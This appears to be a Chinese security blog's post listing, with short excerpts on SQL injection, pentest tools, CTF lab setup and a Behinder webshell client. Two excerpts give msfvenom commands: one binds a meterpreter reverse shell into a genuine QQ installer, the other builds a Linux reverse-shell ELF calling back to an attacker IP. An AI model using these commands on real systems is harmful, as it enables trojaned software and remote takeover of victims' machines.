- 博客(9)
- 收藏
- 关注
原创 sql注入类型
1. 什么是sql注入通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。2. sql注入类型按照注入点类型来分类(1)数字型注入点许多网页链接有类似的结构http://xxx.com/users.php?id=1基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如 查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回..
2022-04-30 18:34:40 4477
原创 网络安全工具列表
网络安全工具列表Sec-Tools-List主要总结渗透中利用到的一些工具,按照ATT&CK矩阵的流程进行分类,在此基础上进行了更细致的划分。一些常用的工具(Nmap、MSF、Minikatz不在记录)Initial_Access1. 信息搜集1.1 人员泄露信息(浏览器、泄露数据库)datasploittheHarvesterspiderfoot社交信息ScrapedIn:搜索 Linkedin 信息ThreatIngestor:Twitter、RSS等文件元数据
2022-04-20 17:13:05 8962
原创 从0到1:CTFer成长之路docker环境搭建
1. 安装 docker使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使用国内 daocloud 一键安装命令: sudo curl -sSL https://get.daocloud.io/docker | sh 由于之前使用了 snap 安装过 docker,运行 docker 命令出现: bash:/snap/bin/do...
2022-04-17 20:21:03 1549
原创 msfconsole捆绑木马
捆绑木马这里使用的是Kalilinux虚拟机攻击机ip是192.168.0.108靶机ip是192.168.177.134生成木马文件首先上传一个正常的安装包到kali里面我这里下了一个QQ把它上传到了root路径下然后开始捆绑msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe-p:指定后面.
2022-04-15 19:50:19 6556 7
原创 Ubuntu 系统下安装Discuz出现“HTTP ERROR 500”目前无法处理此请求
问题:当我们在Ubuntu 16.04系统下安装Disucz X3时,修改好文件的权限,浏览器输入地址安装时出现如下图所示问题:问题查询:在终端输入:tail -f /var/log/apache2/error.log查看错误日志,可以看到如下错误日志:日志显示在目录/discuz/install/index.php第12行出现“Call to undefined function set_magic_quotes_runtime()”,这是因为我按安装的是php7.0,而这个函数“s
2022-03-31 22:21:15 619
原创 云服务器msf跨域反弹shell
环境部署服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。生成木马msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马利用msf攻击使用xftp将生成的木马上传进被攻击机内,这里放
2022-03-29 20:37:15 6034
原创 冰蝎(Behinder)双击无法打开
本机安装java环境版本:java 17.0.2 2022-01-18 LTSJava(TM) SE Runtime Environment (build 17.0.2+8-LTS-86)Java HotSpot(TM) 64-Bit Server VM (build 17.0.2+8-LTS-86, mixed mode, sharing)放一下冰蝎链接:Releases · rebeyond/Behinder · GitHub打不开的原因:冰蝎beta7版本客户端不再内置
2022-03-27 19:18:29 11255
原创 ubuntu下搭建不同端口网站
第一次用ubuntu手动搭建wordpress,discuz走了很多弯路,由于不熟练导致有些地方总是出错不能够正常执行,总结了一下方便以后查看。安装 Apache:sudo apt updatesudo apt install apache2安装 php:sudo apt updatesudo apt install php libapache2-mod-php安装php-mysql插件:apt install -y php-mysql安装 MySQL 5.7:sud
2022-03-12 10:38:23 1529 1
原创 关于upload-labs靶场的安装问题
从github下载的源码解压到网站路径之后打开会出现打开config.php查看代码发现<?phpheader("Content-type: text/html;charset=utf-8");//error_reporting(0);//设置靶机所在路径$site_root = "/upload-labs";//设置上传目录$UPLOAD_ADDR = "../upload/";?>运行此脚本后会出现Notice: Undefined index: userna
2022-02-16 23:38:59 491
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人